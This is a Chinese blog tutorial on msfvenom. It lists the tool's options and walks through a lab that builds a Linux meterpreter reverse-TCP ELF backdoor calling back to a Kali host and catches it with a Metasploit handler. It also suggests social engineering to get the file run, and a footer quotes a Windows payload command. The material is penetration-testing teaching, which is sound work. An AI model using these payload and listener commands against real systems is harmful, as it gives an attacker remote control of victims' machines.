msfvenom简介及实验

于 2024-04-09 20:01:53 发布
阅读量509 收藏 5
点赞数 5
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56249088/article/details/137562682
版权

一msfvenom简介以及参数:

美少妇(msf)主要用来生成带后门的软件。

进入kali inux查看msfvenom的具体参数说明(我这里使用xshell链接虚拟机):

msfvenom -h

参数具体说明:

-l, --list <type>:列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,......all
-p, --payload <payload>:指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-f, --format <format>:指定输出格式
-e, --encoder <encoder>:指定需要使用的encoder(编码器),如果既没用-e选项也没用-b选项,则输出raw payload
-a, --arch <architecture>:指定payload的目标架构,例如x86 还是 x64 还是 x86_64
--platform <platform>:指定payload的目标平台
-o, --out <path>:指定创建好的payload的存放位置
-b, --bad-chars <list>:设定规避字符集,指定需要过滤的坏字符,避免加密后无法使用。例如:不使用 '\x0f'、'\x00'
-n, --nopsled <length>:为payload预先指定一个NOP滑动长度
-s, --space <length>:设定有效攻击荷载的最大长度,就是文件大小
-i, --iterations <count>:指定payload的编码次数
-c, --add-code <path>:指定一个附加的win32 shellcode文件
-x, --template <path>:指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, --keep:保护模板程序的动作,注入的payload作为一个新的进程运行
-v, --var-name <value>:指定一个自定义的变量,以确定输出格式
-t, --timeout <second>:从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)
-h,--help:查看帮助选项

二.木马的连接方式

  • 正向连接(bind)

    攻击方主动去被攻击方上的某个端口

  • 反向连接(reverse)

    被攻击方使用某个端口主动连接攻击方的某个端口

这里我想说明一下,一般来说msfvenom生成木马程序使用的常见连接是反向连接,更稳定且一般来说不会被防火墙阻掉。

三.生成木马

kali:192.168.153.129

centos7(靶机)

生成木马程序:

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.153.129 lport=6666 -f elf -o cai_cai_zhe_shi_shen_me.elf

-p:指定载荷为linux/x64/meterpreter/reverse_tcp也就是linux内核64架构的tcp反向连接载荷

lhost/lport:kali的ip与端口 

-f:输出格式为elf文件

-o:输出名字为你猜猜这是什么.elf

这时候我们就可以利用社工的方式让被攻击者获取到这个elf文件并且执行它(这个文件名有点蠢就是了= =)

我这里就直接上传到centos虚拟机里

然后回到kali里面利用msfconsole监听

使用handler模块

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 192.168.153.129
set lport 6666
run

然后就等待centos那边执行,这边就连接上了

注意那边把文件权限chmod一下

再回到kali:

连接成功!

通过shell执行命令

看到内核版本以及切换到根目录查看文件

咱们就可以控制这台centos7系统的主机了

Lee清松
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msfvenom常用参数
m0_61506558的博客
08-29 1511
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行文件。 前提条件: 1.Linux环境。 2.安装了METASPLOIT框架。 如果您在Kali Linux上运行它会更好。 安装说明 : 下载程序并提供可执行的permision,然后使用./PayloadCreator.pl运行,或者在没有givin permision的情况下运行perl PayloadCreator.pl *忽略info.pl
metasploit---msfvenom
孤的博客
11-21 1497
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
msfvenom
煮酒闲谈
09-22 4259
摘要在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。msfvenom:>>> msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfp
Msfvenom介绍及利用
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
metasploit之msfvenom
Yale的博客
01-31 2474
先来看看msfvenom的帮助菜单 我们先来看一个示例 使用Msfvenom生成一个windows下的绑定shell的shellcode,使用shikata_ga_nai编码器,迭代编码了三次,过滤了null字符,使用python格式 我们可以使用-platform指定很多平台,上面的例子指定的是windows下的,我们同样也可以指定cisco,os x,solaris,bsd等 使用—hel...
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
76-76.渗透测试-msfvenom 常用参数下.mp4
最新发布
05-10
76-76.渗透测试-msfvenom 常用参数下.mp4
75-75.渗透测试-msfvenom 常用参数上.mp4
05-10
75-75.渗透测试-msfvenom 常用参数上.mp4
msfvenom基本使用
02-24
msfvenom常用的一些后门总结
柠檬:简单的MSFVenom有效负载生成器
02-14
柠檬 一个简单的MSFVenom有效载荷生成器 安装 git clone https://github.com/spicesouls/lemon cd lemon bash setup.sh python3 lemon.py
msfvenom 简介
weixin_34138377的博客
10-23 1509
信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了(所以说喜欢收集shellcode是一件好事),没错我特么的也找不到了。其实可以use到自己要使用的payload,然后制作。但是也有人喜欢直接在终端里生产自己的shellcode。另外我想也找不到msfencode了,msfencode是shellcode的编码器,准确的来讲如果你自己编写一个shellco...
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
msfvenom 使用
prettyX的博客
04-12 292
参考: https://blog.csdn.net/caiqiiqi/article/details/70768972 https://blog.csdn.net/whatday/article/details/82904623 比如,我们要生成一个在Linux平台下使用的elf,可以使用如下命令: msfvenom -p linux/x86/meterpreter_reverse...
Msfvenom的使用
Beret-81的博客
03-12 1028
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
Msfvenom建立后门程序指令及开启监听
Dreamsi_zhang的博客
08-13 7150
一、场景介绍
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 326
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3485
msfvenom的使用
写一个MSFvenom实践实验总结50字
02-22
MSFvenom是一种强大的攻击框架,可用于编写各种恶意软件,进行渗透测试等。它支持多种架构和编程语言,可以非常有效地生成恶意代码,以及生成可以被许多安全程序和抗恶意软件破解的恶意软件。它还支持多种加密方法,可以有效地防止病毒分析和阻止反病毒软件。总之,MSFvenom是一个非常有用的攻击框架,可以提供有效的攻击和渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值